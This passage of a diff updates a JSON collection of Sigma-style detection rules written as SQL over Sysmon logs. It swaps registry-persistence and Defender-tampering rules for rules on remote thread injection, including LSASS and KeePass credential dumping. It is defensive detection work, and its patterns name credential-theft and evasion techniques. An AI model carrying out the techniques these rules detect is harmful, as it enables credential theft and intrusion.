"registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "status": "experimental", + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "Session Manager Autorun Keys Modification", - "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "status": "experimental", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", - "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Potential Persistence Via Shim Database Modification", - "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", - "status": "experimental", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", - "author": "frack113", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "status": "test", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.t1546.011" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (Details = ''))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_persistence_shim_databases.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "Disable Exploit Guard Network Protection on Windows Defender", - "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", - "status": "experimental", - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "author": "Austin Songer @austinsonger", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "status": "test", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND Details = 'DWORD (00000001)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Persistence Via Disk Cleanup Handler - Autorun", - "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (Details LIKE '%cmd%' ESCAPE '\\' OR Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%wsl%' ESCAPE '\\' OR Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" ], - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", - "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "Windows Defender Exclusions Added - Registry", - "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "status": "test", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], + "title": "Suspicious Remote Thread Target", + "id": "f016c716-754a-467f-a39e-63c06f773987", + "status": "experimental", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrator actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" ], - "filename": "registry_set_defender_exclusions.yml" + "filename": "create_remote_thread_win_susp_remote_thread_target.yml" }, { - "title": "CurrentControlSet Autorun Keys Modification", - "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation Via PowerShell", + "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", + "status": "test", + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR Details LIKE 'CutePDF Writer' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND Details = 'VNCpm.dll')))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" + "filename": "create_remote_thread_win_powershell_crt.yml" }, { - "title": "Persistence Via New SIP Provider", - "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", - "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools", + "id": "db809f10-56ce-4420-8c86-d6a7d793c79c", + "status": "test", + "description": "Detects raw disk access using uncommon tools, which could indicate possible defense evasion attempts", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1553.003" + "attack.t1006" ], "falsepositives": [ - "Legitimate SIP being registered by the OS or different software." + "Legitimate Administrator using tool for raw access or ongoing forensic investigation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((Details IN ('WINTRUST.DLL', 'mso.dll')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '9' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Device LIKE '%floppy%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 